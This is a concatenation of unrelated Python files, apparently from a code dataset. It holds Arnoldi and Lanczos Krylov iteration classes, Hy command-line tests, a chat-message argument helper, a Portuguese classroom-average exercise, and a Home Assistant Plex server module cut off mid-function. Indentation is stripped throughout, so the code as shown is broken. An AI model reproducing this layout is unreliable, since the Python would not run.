self.houses = [Householder(v)]
self.vnorm = np.linalg.norm(v, 2)
# TODO set self.is_invariant = True for self.vnorm == 0
self.V.append(v / np.where(self.vnorm != 0.0, self.vnorm, 1.0))
# if self.vnorm > 0:
# self.V[0] = v / self.vnorm
# else:
# self.is_invariant = True
def __iter__(self):
return self
def __next__(self):
"""Carry out one iteration of Arnoldi."""
if self.is_invariant:
raise ArgumentError(
"Krylov subspace was found to be invariant in the previous iteration."
)
k = self.iter
Av = self.A @ self.V[k]
for j in range(k + 1):
Av[j:] = self.houses[j] @ Av[j:]
Av[j] *= np.conj(self.houses[j].alpha)
N = self.v.shape[0]
if k < N - 1:
house = Householder(Av[k + 1 :])
self.houses.append(house)
Av[k + 1 :] = (house @ Av[k + 1 :]) * np.conj(house.alpha)
h = Av[: k + 2]
h[-1] = np.abs(h[-1])
if h[-1] <= 1.0e-14:
self.is_invariant = True
v = None
else:
vnew = np.zeros_like(self.v)
vnew[k + 1] = 1
for j in range(k + 1, -1, -1):
vnew[j:] = self.houses[j] @ vnew[j:]
v = vnew * self.houses[-1].alpha
self.V.append(v)
else:
h = np.zeros([len(Av) + 1] + list(self.v.shape[1:]), Av.dtype)
h[:-1] = Av
self.is_invariant = True
v = None
self.iter += 1
return v, h
class ArnoldiMGS:
def __init__(
self,
A,
v,
num_reorthos: int = 1,
M=None,
Mv=None,
Mv_norm=None,
inner=None,
):
self.inner = get_default_inner(v.shape) if inner is None else inner
# save parameters
self.A = A
self.v = v
self.num_reorthos = num_reorthos
self.M = Identity() if M is None else aslinearoperator(M)
self.dtype = np.find_common_type([A.dtype, self.M.dtype, v.dtype], [])
# number of iterations
self.iter = 0
# Arnoldi basis
self.V = []
self.P = []
# flag indicating if Krylov subspace is invariant
self.is_invariant = False
p = v
if Mv is None:
v = self.M @ p
else:
v = Mv
if Mv_norm is None:
self.vnorm = np.sqrt(inner(p, v))
else:
self.vnorm = Mv_norm
self.P.append(p / np.where(self.vnorm != 0.0, self.vnorm, 1.0))
# TODO set self.is_invariant = True for self.vnorm == 0
self.V.append(v / np.where(self.vnorm != 0.0, self.vnorm, 1.0))
# if self.vnorm > 0:
# self.V[0] = v / self.vnorm
# else:
# self.is_invariant = True
def next_mgs(self, k, Av):
# modified Gram-Schmidt orthogonalization
for j in range(k + 1):
alpha = self.inner(self.V[j], Av)
self.h[j] += alpha
Av -= alpha * self.P[j]
def __iter__(self):
return self
def __next__(self):
if self.is_invariant:
raise ArgumentError(
"Krylov subspace was found to be invariant in the previous iteration."
)
k = self.iter
# the matrix-vector multiplication
Av = self.A @ self.V[k]
self.h = np.zeros([k + 2] + list(self.v.shape[1:]), dtype=self.dtype)
# determine vectors for orthogonalization
for _ in range(self.num_reorthos):
self.next_mgs(k, Av)
MAv = self.M @ Av
self.h[k + 1] = np.sqrt(self.inner(Av, MAv))
if np.all(self.h[k + 1] <= 1.0e-14):
self.is_invariant = True
v = None
else:
Hk1k = np.where(self.h[k + 1] != 0.0, self.h[k + 1], 1.0)
self.P.append(Av / Hk1k)
v = MAv / Hk1k
if v is not None:
self.V.append(v)
# increase iteration counter
self.iter += 1
return v, self.h
class ArnoldiLanczos:
def __init__(self, A, v, M=None, Mv=None, Mv_norm=None, inner=None):
self.A = A
self.M = Identity() if M is None else aslinearoperator(M)
self.inner = get_default_inner(v.shape) if inner is None else inner
self.dtype = np.find_common_type([A.dtype, self.M.dtype, v.dtype], [])
# number of iterations
self.num_iter = 0
# stores the three tridiagonal entries of the Hessenberg matrix
self.h = np.zeros([3] + list(v.shape[1:]), dtype=self.dtype)
# flag indicating if Krylov subspace is invariant
self.is_invariant = False
p = v
v = self.M @ p if Mv is None else Mv
self.vnorm = np.sqrt(inner(p, v)) if Mv_norm is None else Mv_norm
# self.P.append(p / np.where(self.vnorm != 0.0, self.vnorm, 1.0))
# # TODO set self.is_invariant = True for self.vnorm == 0
# self.V.append(v / np.where(self.vnorm != 0.0, self.vnorm, 1.0))
self.p_old = None
self.p = p / np.where(self.vnorm != 0.0, self.vnorm, 1.0)
self.v = v / np.where(self.vnorm != 0.0, self.vnorm, 1.0)
# if self.vnorm > 0:
# self.V[0] = v / self.vnorm
# else:
# self.is_invariant = True
def __next__(self):
"""Carry out one iteration of Arnoldi."""
if self.is_invariant:
raise ArgumentError(
"Krylov subspace was found to be invariant in the previous iteration."
)
Av = self.A @ self.v
if self.num_iter > 0:
# copy the old lower-diagonal entry to the upper diagonal
self.h[0] = self.h[2]
Av -= self.h[0] * self.p_old
# orthogonalize
alpha = self.inner(self.v, Av)
# if self.ortho == "lanczos":
# # check if alpha is real
# if abs(alpha.imag) > 1e-10:
# warnings.warn(
# f"Iter {self.iter}: "
# f"abs(alpha.imag) = {abs(alpha.imag)} > 1e-10. "
# "Is your operator self-adjoint "
# "in the provided inner product?"
# )
# alpha = alpha.real
self.h[1] = alpha
Av -= alpha * self.p
MAv = self.M @ Av
self.h[2] = np.sqrt(self.inner(Av, MAv))
if np.all(self.h[2] <= 1.0e-14):
self.is_invariant = True
self.v = None
self.p = None
else:
Hk1k = np.where(self.h[2] != 0.0, self.h[2], 1.0)
self.p_old = self.p
self.p = Av / Hk1k
self.v = MAv / Hk1k
# increase iteration counter
self.num_iter += 1
return self.v, self.h, self.p
def arnoldi_res(A, V, H, inner=None):
"""Measure Arnoldi residual.
:param A: a linear operator that can be used with scipy's aslinearoperator with
``shape==(N,N)``.
:param V: Arnoldi basis matrix with ``shape==(N,n)``.
:param H: Hessenberg matrix: either :math:`\\underline{H}_{n-1}` with
``shape==(n,n-1)`` or :math:`H_n` with ``shape==(n,n)`` (if the Arnoldi basis
spans an A-invariant subspace).
:param inner: (optional) the inner product to use, see :py:meth:`inner`.
:returns: either :math:`\\|AV_{n-1} - V_n \\underline{H}_{n-1}\\|` or
:math:`\\|A V_n - V_n H_n\\|` (in the invariant case).
"""
invariant = H.shape[0] == H.shape[1]
V1 = V if invariant else V[:, :-1]
res = A * V1 - np.dot(V, H)
return np.sqrt(inner(res, res))
|
the-stack_0_1600 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2018 the authors.
# This file is part of Hy, which is free software licensed under the Expat
# license. See the LICENSE.
import os
import re
import shlex
import subprocess
import pytest
from hy._compat import builtins
from hy.importer import get_bytecode_path
hy_dir = os.environ.get('HY_DIR', '')
def hr(s=""):
return "hy --repl-output-fn=hy.contrib.hy-repr.hy-repr " + s
def run_cmd(cmd, stdin_data=None, expect=0, dontwritebytecode=False):
env = dict(os.environ)
if dontwritebytecode:
env["PYTHONDONTWRITEBYTECODE"] = "1"
else:
env.pop("PYTHONDONTWRITEBYTECODE", None)
cmd = shlex.split(cmd)
cmd[0] = os.path.join(hy_dir, cmd[0])
p = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
shell=False,
env=env)
output = p.communicate(input=stdin_data)
assert p.wait() == expect
return output
def rm(fpath):
try:
os.remove(fpath)
except (IOError, OSError):
try:
os.rmdir(fpath)
except (IOError, OSError):
pass
def test_bin_hy():
run_cmd("hy", "")
def test_bin_hy_stdin():
output, _ = run_cmd("hy", '(koan)')
assert "monk" in output
output, _ = run_cmd("hy --spy", '(koan)')
assert "monk" in output
assert "\n Ummon" in output
# --spy should work even when an exception is thrown
output, _ = run_cmd("hy --spy", '(foof)')
assert "foof()" in output
def test_bin_hy_stdin_multiline():
output, _ = run_cmd("hy", '(+ "a" "b"\n"c" "d")')
assert "'abcd'" in output
def test_bin_hy_history():
output, _ = run_cmd("hy", '''(+ "a" "b")
(+ "c" "d")
(+ "e" "f")
(.format "*1: {}, *2: {}, *3: {}," *1 *2 *3)''')
assert "'*1: ef, *2: cd, *3: ab,'" in output
output, _ = run_cmd("hy", '''(raise (Exception "TEST ERROR"))
(+ "err: " (str *e))''')
assert "'err: TEST ERROR'" in output
def test_bin_hy_stdin_comments():
_, err_empty = run_cmd("hy", '')
output, err = run_cmd("hy", '(+ "a" "b") ; "c"')
assert "'ab'" in output
assert err == err_empty
_, err = run_cmd("hy", '; 1')
assert err == err_empty
def test_bin_hy_stdin_assignment():
# If the last form is an assignment, don't print the value.
output, _ = run_cmd("hy", '(setv x (+ "A" "Z"))')
assert "AZ" not in output
output, _ = run_cmd("hy", '(setv x (+ "A" "Z")) (+ "B" "Y")')
assert "AZ" not in output
assert "BY" in output
output, _ = run_cmd("hy", '(+ "B" "Y") (setv x (+ "A" "Z"))')
assert "AZ" not in output
assert "BY" not in output
def test_bin_hy_stdin_as_arrow():
# https://github.com/hylang/hy/issues/1255
output, _ = run_cmd("hy", "(as-> 0 it (inc it) (inc it))")
assert re.match(r"=>\s+2L?\s+=>", output)
def test_bin_hy_stdin_error_underline_alignment():
_, err = run_cmd("hy", "(defmacro mabcdefghi [x] x)\n(mabcdefghi)")
assert "\n (mabcdefghi)\n ^----------^" in err
def test_bin_hy_stdin_except_do():
# https://github.com/hylang/hy/issues/533
output, _ = run_cmd("hy", '(try (/ 1 0) (except [ZeroDivisionError] "hello"))') # noqa
assert "hello" in output
output, _ = run_cmd("hy", '(try (/ 1 0) (except [ZeroDivisionError] "aaa" "bbb" "ccc"))') # noqa
assert "aaa" not in output
assert "bbb" not in output
assert "ccc" in output
output, _ = run_cmd("hy", '(if True (do "xxx" "yyy" "zzz"))')
assert "xxx" not in output
assert "yyy" not in output
assert "zzz" in output
def test_bin_hy_stdin_unlocatable_hytypeerror():
# https://github.com/hylang/hy/issues/1412
# The chief test of interest here is the returncode assertion
# inside run_cmd.
_, err = run_cmd("hy", """
(import hy.errors)
(raise (hy.errors.HyTypeError '[] (+ "A" "Z")))""")
assert "AZ" in err
def test_bin_hy_stdin_bad_repr():
# https://github.com/hylang/hy/issues/1389
output, err = run_cmd("hy", """
(defclass BadRepr [] (defn __repr__ [self] (/ 0)))
(BadRepr)
(+ "A" "Z")""")
assert "ZeroDivisionError" in err
assert "AZ" in output
def test_bin_hy_stdin_hy_repr():
output, _ = run_cmd("hy", '(+ [1] [2])')
assert "[1, 2]" in output.replace('L', '')
output, _ = run_cmd(hr(), '(+ [1] [2])')
assert "[1 2]" in output
output, _ = run_cmd(hr("--spy"), '(+ [1] [2])')
assert "[1]+[2]" in output.replace('L', '').replace(' ', '')
assert "[1 2]" in output
# --spy should work even when an exception is thrown
output, _ = run_cmd(hr("--spy"), '(+ [1] [2] (foof))')
assert "[1]+[2]" in output.replace('L', '').replace(' ', '')
def test_bin_hy_ignore_python_env():
os.environ.update({"PYTHONTEST": '0'})
output, _ = run_cmd("hy -c '(print (do (import os) (. os environ)))'")
assert "PYTHONTEST" in output
output, _ = run_cmd("hy -m tests.resources.bin.printenv")
assert "PYTHONTEST" in output
output, _ = run_cmd("hy tests/resources/bin/printenv.hy")
assert "PYTHONTEST" in output
output, _ = run_cmd("hy -E -c '(print (do (import os) (. os environ)))'")
assert "PYTHONTEST" not in output
os.environ.update({"PYTHONTEST": '0'})
output, _ = run_cmd("hy -E -m tests.resources.bin.printenv")
assert "PYTHONTEST" not in output
os.environ.update({"PYTHONTEST": '0'})
output, _ = run_cmd("hy -E tests/resources/bin/printenv.hy")
assert "PYTHONTEST" not in output
def test_bin_hy_cmd():
output, _ = run_cmd("hy -c \"(koan)\"")
assert "monk" in output
_, err = run_cmd("hy -c \"(koan\"", expect=1)
assert "Premature end of input" in err
def test_bin_hy_icmd():
output, _ = run_cmd("hy -i \"(koan)\"", "(ideas)")
assert "monk" in output
assert "figlet" in output
def test_bin_hy_icmd_file():
output, _ = run_cmd("hy -i resources/icmd_test_file.hy", "(ideas)")
assert "Hy!" in output
def test_bin_hy_icmd_and_spy():
output, _ = run_cmd("hy -i \"(+ [] [])\" --spy", "(+ 1 1)")
assert "[] + []" in output
def test_bin_hy_missing_file():
_, err = run_cmd("hy foobarbaz", expect=2)
assert "No such file" in err
def test_bin_hy_file_with_args():
assert "usage" in run_cmd("hy tests/resources/argparse_ex.hy -h")[0]
assert "got c" in run_cmd("hy tests/resources/argparse_ex.hy -c bar")[0]
assert "foo" in run_cmd("hy tests/resources/argparse_ex.hy -i foo")[0]
assert "foo" in run_cmd("hy tests/resources/argparse_ex.hy -i foo -c bar")[0] # noqa
def test_bin_hyc():
_, err = run_cmd("hyc", expect=2)
assert "usage" in err
output, _ = run_cmd("hyc -h")
assert "usage" in output
path = "tests/resources/argparse_ex.hy"
output, _ = run_cmd("hyc " + path)
assert "Compiling" in output
assert os.path.exists(get_bytecode_path(path))
rm(get_bytecode_path(path))
def test_bin_hyc_missing_file():
_, err = run_cmd("hyc foobarbaz", expect=2)
assert "[Errno 2]" in err
def test_bin_hy_builtins():
# hy.cmdline replaces builtins.exit and builtins.quit
# for use by hy's repl.
import hy.cmdline # NOQA
# this test will fail if run from IPython because IPython deletes
# builtins.exit and builtins.quit
assert str(builtins.exit) == "Use (exit) or Ctrl-D (i.e. EOF) to exit"
assert type(builtins.exit) is hy.cmdline.HyQuitter
assert str(builtins.quit) == "Use (quit) or Ctrl-D (i.e. EOF) to exit"
assert type(builtins.quit) is hy.cmdline.HyQuitter
def test_bin_hy_main():
output, _ = run_cmd("hy tests/resources/bin/main.hy")
assert "Hello World" in output
def test_bin_hy_main_args():
output, _ = run_cmd("hy tests/resources/bin/main.hy test 123")
assert "test" in output
assert "123" in output
def test_bin_hy_main_exitvalue():
run_cmd("hy tests/resources/bin/main.hy exit1", expect=1)
def test_bin_hy_no_main():
output, _ = run_cmd("hy tests/resources/bin/nomain.hy")
assert "This Should Still Work" in output
@pytest.mark.parametrize('scenario', [
"normal", "prevent_by_force", "prevent_by_env"])
@pytest.mark.parametrize('cmd_fmt', [
'hy {fpath}', 'hy -m {modname}', "hy -c '(import {modname})'"])
def test_bin_hy_byte_compile(scenario, cmd_fmt):
modname = "tests.resources.bin.bytecompile"
fpath = modname.replace(".", "/") + ".hy"
cmd = cmd_fmt.format(**locals())
rm(get_bytecode_path(fpath))
if scenario == "prevent_by_force":
# Keep Hy from being able to byte-compile the module by
# creating a directory at the target location.
os.mkdir(get_bytecode_path(fpath))
# Whether or not we can byte-compile the module, we should be able
# to run it.
output, _ = run_cmd(cmd, dontwritebytecode=scenario == "prevent_by_env")
assert "Hello from macro" in output
assert "The macro returned: boink" in output
if scenario == "normal":
# That should've byte-compiled the module.
assert os.path.exists(get_bytecode_path(fpath))
elif scenario == "prevent_by_env":
# No byte-compiled version should've been created.
assert not os.path.exists(get_bytecode_path(fpath))
# When we run the same command again, and we've byte-compiled the
# module, the byte-compiled version should be run instead of the
# source, in which case the macro shouldn't be run.
output, _ = run_cmd(cmd)
assert ("Hello from macro" in output) ^ (scenario == "normal")
assert "The macro returned: boink" in output
def test_bin_hy_module_main():
output, _ = run_cmd("hy -m tests.resources.bin.main")
assert "Hello World" in output
def test_bin_hy_module_main_args():
output, _ = run_cmd("hy -m tests.resources.bin.main test 123")
assert "test" in output
assert "123" in output
def test_bin_hy_module_main_exitvalue():
run_cmd("hy -m tests.resources.bin.main exit1", expect=1)
def test_bin_hy_module_no_main():
output, _ = run_cmd("hy -m tests.resources.bin.nomain")
assert "This Should Still Work" in output
|
the-stack_0_1601 | # MIT License
# Copyright (c) 2022 Zenitsu Prjkt™
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
def get_arg(message):
msg = message.text
msg = msg.replace(" ", "", 1) if msg[1] == " " else msg
split = msg[1:].replace("\n", " \n").split(" ")
if " ".join(split[1:]).strip() == "":
return ""
return " ".join(split[1:])
|
the-stack_0_1602 | # Marcelo Campos de Medeiros
# ADS UNIFIP
# Estrutura de Repetição
# 25/03/2020
'''
27 -Faça um programa que calcule o número médio de alunos por turma.
Para isto, peça a quantidade de turmas e a quantidade de alunos
para cada turma. As turmas não podem ter mais de 40 alunos.
'''
print('=' * 40)
print('{:=^40}'.format(" 'NÚMERO MÉDIO DE ALUNOS POR TURMA' "))
print('=' * 40, '\n')
turmas = int(input('Qual a quantidade de turmas: '))
soma = 0
for c in range(1, turmas + 1):
# para que a menssagem se repita caso informe < 40 alunos
while True:
alunos = int(input(f'{c}° turma tem quantos alunos: '))
if alunos <= 40:
break
else:
print('As turmas não podem ter mais de 40 alunos. Digite novamente.')
soma += alunos
print(f'A escola têm {turmas} turmas\n'
f'Com total de alunos de {soma}\n'
f'Assim a média de alunos por turma é {soma / turmas:2}') |
the-stack_0_1603 | """Shared class to maintain Plex server instances."""
import logging
import ssl
import time
from urllib.parse import urlparse
from plexapi.exceptions import NotFound, Unauthorized
import plexapi.myplex
import plexapi.playqueue
import plexapi.server
from requests import Session
import requests.exceptions
from homeassistant.components.media_player import DOMAIN as MP_DOMAIN
from homeassistant.components.media_player.const import (
MEDIA_TYPE_EPISODE,
MEDIA_TYPE_MUSIC,
MEDIA_TYPE_PLAYLIST,
MEDIA_TYPE_VIDEO,
)
from homeassistant.const import CONF_CLIENT_ID, CONF_TOKEN, CONF_URL, CONF_VERIFY_SSL
from homeassistant.core import callback
from homeassistant.helpers.debounce import Debouncer
from homeassistant.helpers.dispatcher import async_dispatcher_send
from .const import (
CONF_IGNORE_NEW_SHARED_USERS,
CONF_IGNORE_PLEX_WEB_CLIENTS,
CONF_MONITORED_USERS,
CONF_SERVER,
CONF_USE_EPISODE_ART,
DEBOUNCE_TIMEOUT,
DEFAULT_VERIFY_SSL,
DOMAIN,
PLAYER_SOURCE,
PLEX_NEW_MP_SIGNAL,
PLEX_UPDATE_MEDIA_PLAYER_SIGNAL,
PLEX_UPDATE_SENSOR_SIGNAL,
PLEXTV_THROTTLE,
X_PLEX_DEVICE_NAME,
X_PLEX_PLATFORM,
X_PLEX_PRODUCT,
X_PLEX_VERSION,
)
from .errors import NoServersFound, ServerNotSpecified, ShouldUpdateConfigEntry
_LOGGER = logging.getLogger(__name__)
# Set default headers sent by plexapi
plexapi.X_PLEX_DEVICE_NAME = X_PLEX_DEVICE_NAME
plexapi.X_PLEX_PLATFORM = X_PLEX_PLATFORM
plexapi.X_PLEX_PRODUCT = X_PLEX_PRODUCT
plexapi.X_PLEX_VERSION = X_PLEX_VERSION
class PlexServer:
"""Manages a single Plex server connection."""
def __init__(self, hass, server_config, known_server_id=None, options=None):
"""Initialize a Plex server instance."""
self.hass = hass
self._plex_account = None
self._plex_server = None
self._created_clients = set()
self._known_clients = set()
self._known_idle = set()
self._url = server_config.get(CONF_URL)
self._token = server_config.get(CONF_TOKEN)
self._server_name = server_config.get(CONF_SERVER)
self._verify_ssl = server_config.get(CONF_VERIFY_SSL, DEFAULT_VERIFY_SSL)
self._server_id = known_server_id
self.options = options
self.server_choice = None
self._accounts = []
self._owner_username = None
self._plextv_clients = None
self._plextv_client_timestamp = 0
self._plextv_device_cache = {}
self._use_plex_tv = self._token is not None
self._version = None
self.async_update_platforms = Debouncer(
hass,
_LOGGER,
cooldown=DEBOUNCE_TIMEOUT,
immediate=True,
function=self._async_update_platforms,
).async_call
# Header conditionally added as it is not available in config entry v1
if CONF_CLIENT_ID in server_config:
plexapi.X_PLEX_IDENTIFIER = server_config[CONF_CLIENT_ID]
plexapi.myplex.BASE_HEADERS = plexapi.reset_base_headers()
plexapi.server.BASE_HEADERS = plexapi.reset_base_headers()
@property
def account(self):
"""Return a MyPlexAccount instance."""
if not self._plex_account and self._use_plex_tv:
try:
self._plex_account = plexapi.myplex.MyPlexAccount(token=self._token)
except Unauthorized:
self._use_plex_tv = False
_LOGGER.error("Not authorized to access plex.tv with provided token")
raise
return self._plex_account
def plextv_clients(self):
"""Return available clients linked to Plex account."""
if self.account is None:
return []
now = time.time()
if now - self._plextv_client_timestamp > PLEXTV_THROTTLE:
self._plextv_client_timestamp = now
self._plextv_clients = [
x
for x in self.account.resources()
if "player" in x.provides and x.presence
]
_LOGGER.debug(
"Current available clients from plex.tv: %s", self._plextv_clients
)
return self._plextv_clients
def connect(self):
"""Connect to a Plex server directly, obtaining direct URL if necessary."""
config_entry_update_needed = False
def _connect_with_token():
available_servers = [
(x.name, x.clientIdentifier)
for x in self.account.resources()
if "server" in x.provides
]
if not available_servers:
raise NoServersFound
if not self._server_name and len(available_servers) > 1:
raise ServerNotSpecified(available_servers)
self.server_choice = (
self._server_name if self._server_name else available_servers[0][0]
)
self._plex_server = self.account.resource(self.server_choice).connect(
timeout=10
)
def _connect_with_url():
session = None
if self._url.startswith("https") and not self._verify_ssl:
session = Session()
session.verify = False
self._plex_server = plexapi.server.PlexServer(
self._url, self._token, session
)
def _update_plexdirect_hostname():
matching_servers = [
x.name
for x in self.account.resources()
if x.clientIdentifier == self._server_id
]
if matching_servers:
self._plex_server = self.account.resource(matching_servers[0]).connect(
timeout=10
)
return True
_LOGGER.error("Attempt to update plex.direct hostname failed")
return False
if self._url:
try:
_connect_with_url()
except requests.exceptions.SSLError as error:
while error and not isinstance(error, ssl.SSLCertVerificationError):
error = error.__context__ # pylint: disable=no-member
if isinstance(error, ssl.SSLCertVerificationError):
domain = urlparse(self._url).netloc.split(":")[0]
if domain.endswith("plex.direct") and error.args[0].startswith(
f"hostname '{domain}' doesn't match"
):
_LOGGER.warning(
"Plex SSL certificate's hostname changed, updating."
)
if _update_plexdirect_hostname():
config_entry_update_needed = True
else:
raise Unauthorized(
"New certificate cannot be validated with provided token"
)
else:
raise
else:
raise
else:
_connect_with_token()
try:
system_accounts = self._plex_server.systemAccounts()
except Unauthorized:
_LOGGER.warning(
"Plex account has limited permissions, shared account filtering will not be available."
)
else:
self._accounts = [
account.name for account in system_accounts if account.name
]
_LOGGER.debug("Linked accounts: %s", self.accounts)
owner_account = [
account.name for account in system_accounts if account.accountID == 1
]
if owner_account:
self._owner_username = owner_account[0]
_LOGGER.debug("Server owner found: '%s'", self._owner_username)
self._version = self._plex_server.version
if config_entry_update_needed:
raise ShouldUpdateConfigEntry
@callback
def async_refresh_entity(self, machine_identifier, device, session):
"""Forward refresh dispatch to media_player."""
unique_id = f"{self.machine_identifier}:{machine_identifier}"
_LOGGER.debug("Refreshing %s", unique_id)
async_dispatcher_send(
self.hass,
PLEX_UPDATE_MEDIA_PLAYER_SIGNAL.format(unique_id),
device,
session,
)
def _fetch_platform_data(self):
"""Fetch all data from the Plex server in a single method."""
return (
self._plex_server.clients(),
self._plex_server.sessions(),
self.plextv_clients(),
)
async def _async_update_platforms(self):
"""Update the platform entities."""
_LOGGER.debug("Updating devices")
available_clients = {}
ignored_clients = set()
new_clients = set()
monitored_users = self.accounts
known_accounts = set(self.option_monitored_users)
if known_accounts:
monitored_users = {
user
for user in self.option_monitored_users
if self.option_monitored_users[user]["enabled"]
}
if not self.option_ignore_new_shared_users:
for new_user in self.accounts - known_accounts:
monitored_users.add(new_user)
try:
devices, sessions, plextv_clients = await self.hass.async_add_executor_job(
self._fetch_platform_data
)
except (
plexapi.exceptions.BadRequest,
requests.exceptions.RequestException,
) as ex:
_LOGGER.error(
"Could not connect to Plex server: %s (%s)", self.friendly_name, ex
)
return
def process_device(source, device):
self._known_idle.discard(device.machineIdentifier)
available_clients.setdefault(device.machineIdentifier, {"device": device})
available_clients[device.machineIdentifier].setdefault(
PLAYER_SOURCE, source
)
if device.machineIdentifier not in ignored_clients:
if self.option_ignore_plexweb_clients and device.product == "Plex Web":
ignored_clients.add(device.machineIdentifier)
if device.machineIdentifier not in self._known_clients:
_LOGGER.debug(
"Ignoring %s %s: %s",
"Plex Web",
source,
device.machineIdentifier,
)
return
if device.machineIdentifier not in (
self._created_clients | ignored_clients | new_clients
):
new_clients.add(device.machineIdentifier)
_LOGGER.debug(
"New %s from %s: %s",
device.product,
source,
device.machineIdentifier,
)
for device in devices:
process_device("PMS", device)
def connect_to_resource(resource):
"""Connect to a plex.tv resource and return a Plex client."""
client_id = resource.clientIdentifier
if client_id in self._plextv_device_cache:
return self._plextv_device_cache[client_id]
client = None
try:
client = resource.connect(timeout=3)
_LOGGER.debug("plex.tv resource connection successful: %s", client)
except NotFound:
_LOGGER.error("plex.tv resource connection failed: %s", resource.name)
self._plextv_device_cache[client_id] = client
return client
for plextv_client in plextv_clients:
if plextv_client.clientIdentifier not in available_clients:
device = await self.hass.async_add_executor_job(
connect_to_resource, plextv_client
)
if device:
process_device("plex.tv", device)
for session in sessions:
if session.TYPE == "photo":
_LOGGER.debug("Photo session detected, skipping: %s", session)
continue
session_username = session.usernames[0]
for player in session.players:
if session_username and session_username not in monitored_users:
ignored_clients.add(player.machineIdentifier)
_LOGGER.debug(
"Ignoring %s client owned by '%s'",
player.product,
session_username,
)
continue
process_device("session", player)
available_clients[player.machineIdentifier]["session"] = session
new_entity_configs = []
for client_id, client_data in available_clients.items():
if client_id in ignored_clients:
continue
if client_id in new_clients:
new_entity_configs.append(client_data)
self._created_clients.add(client_id)
else:
self.async_refresh_entity(
client_id, client_data["device"], client_data.get("session")
)
self._known_clients.update(new_clients | ignored_clients)
idle_clients = (
self._known_clients - self._known_idle - ignored_clients
).difference(available_clients)
for client_id in idle_clients:
self.async_refresh_entity(client_id, None, None)
self._known_idle.add(client_id)
self._plextv_device_cache.pop(client_id, None)
if new_entity_configs:
async_dispatcher_send(
self.hass,
PLEX_NEW_MP_SIGNAL.format(self.machine_identifier),
new_entity_configs,
)
async_dispatcher_send(
self.hass,
PLEX_UPDATE_SENSOR_SIGNAL.format(self.machine_identifier),
sessions,
)
@property
def plex_server(self):
"""Return the plexapi PlexServer instance."""
return self._plex_server
@property
def accounts(self):
"""Return accounts associated with the Plex server."""
return set(self._accounts)
@property
def owner(self):
"""Return the Plex server owner username."""
return self._owner_username
@property
def version(self):
"""Return the version of the Plex server."""
return self._version
@property
def friendly_name(self):
"""Return name of connected Plex server."""
return self._plex_server.friendlyName
@property
def machine_identifier(self):
"""Return unique identifier of connected Plex server."""
return self._plex_server.machineIdentifier
@property
def url_in_use(self):
"""Return URL used for connected Plex server."""
return self._plex_server._baseurl # pylint: disable=protected-access
@property
def option_ignore_new_shared_users(self):
"""Return ignore_new_shared_users option."""
return self.options[MP_DOMAIN].get(CONF_IGNORE_NEW_SHARED_USERS, False)
@property
def option_use_episode_art(self):
"""Return use_episode_art option."""
return self.options[MP_DOMAIN].get(CONF_USE_EPISODE_ART, False)
@property
def option_monitored_users(self):
"""Return dict of monitored users option."""
return self.options[MP_DOMAIN].get(CONF_MONITORED_USERS, {})
@property
def option_ignore_plexweb_clients(self):
"""Return ignore_plex_web_clients option."""
return self.options[MP_DOMAIN].get(CONF_IGNORE_PLEX_WEB_CLIENTS, False)
@property
def library(self):
"""Return library attribute from server object."""
return self._plex_server.library
def playlist(self, title):
"""Return playlist from server object."""
return self._plex_server.playlist(title)
def create_playqueue(self, media, **kwargs):
"""Create playqueue on Plex server."""
return plexapi.playqueue.PlayQueue.create(self._plex_server, media, **kwargs)
def fetch_item(self, item):
"""Fetch item from Plex server."""
return self._plex_server.fetchItem(item)
def lookup_media(self, media_type, **kwargs):
"""Lookup a piece of media."""
media_type = media_type.lower()
if media_type == DOMAIN:
key = kwargs["plex_key"]
try:
return self.fetch_item(key)
except NotFound:
_LOGGER.error("Media for key %s not found", key)
return None
if media_type == MEDIA_TYPE_PLAYLIST:
try:
playlist_name = kwargs["playlist_name"]
return self.playlist(playlist_name)
except KeyError:
_LOGGER.error("Must specify 'playlist_name' for this search")
return None
except NotFound:
_LOGGER.error(
"Playlist '%s' not found", playlist_name,
)
return None
try:
library_name = kwargs["library_name"]
library_section = self.library.section(library_name)
except KeyError:
_LOGGER.error("Must specify 'library_name' for this search")
return None
except NotFound:
_LOGGER.error("Library '%s' not found", library_name)
return None
def lookup_music():
"""Search for music and return a Plex media object."""
album_name = kwargs.get("album_name")
track_name = kwargs.get("track_name")
track_number = kwargs.get("track_number")
try:
artist_name = kwargs["artist_name"]
artist = library_section.get(artist_name)
except KeyError:
_LOGGER.error("Must specify 'artist_name' for this search")
return None
except NotFound:
_LOGGER.error(
"Artist '%s' not found in '%s'", artist_name, library_name
)
return None
if album_name:
try:
album = artist.album(album_name)
except NotFound:
_LOGGER.error(
"Album '%s' by '%s' not found", album_name, artist_name
)
return None
if track_name:
try:
return album.track(track_name)
except NotFound:
_LOGGER.error(
"Track '%s' on '%s' by '%s' not found",
track_name,
album_name,
artist_name,
)
return None
if track_number:
for track in album.tracks():
if int(track.index) == int(track_number):
return track
_LOGGER.error(
"Track %d on '%s' by '%s' not found",
track_number,
album_name,
artist_name,
)
return None
return album
if track_name:
try:
return artist.get(track_name)
except NotFound:
_LOGGER.error(
"Track '%s' by '%s' not found", track_name, artist_name
)
return None
return artist
def lookup_tv():
"""Find TV media and return a Plex media object."""
season_number = kwargs.get("season_number")
episode_number = kwargs.get("episode_number")
try:
show_name = kwargs["show_name"]
show = library_section.get(show_name)
except KeyError:
_LOGGER.error("Must specify 'show_name' for this search")
return None
except NotFound:
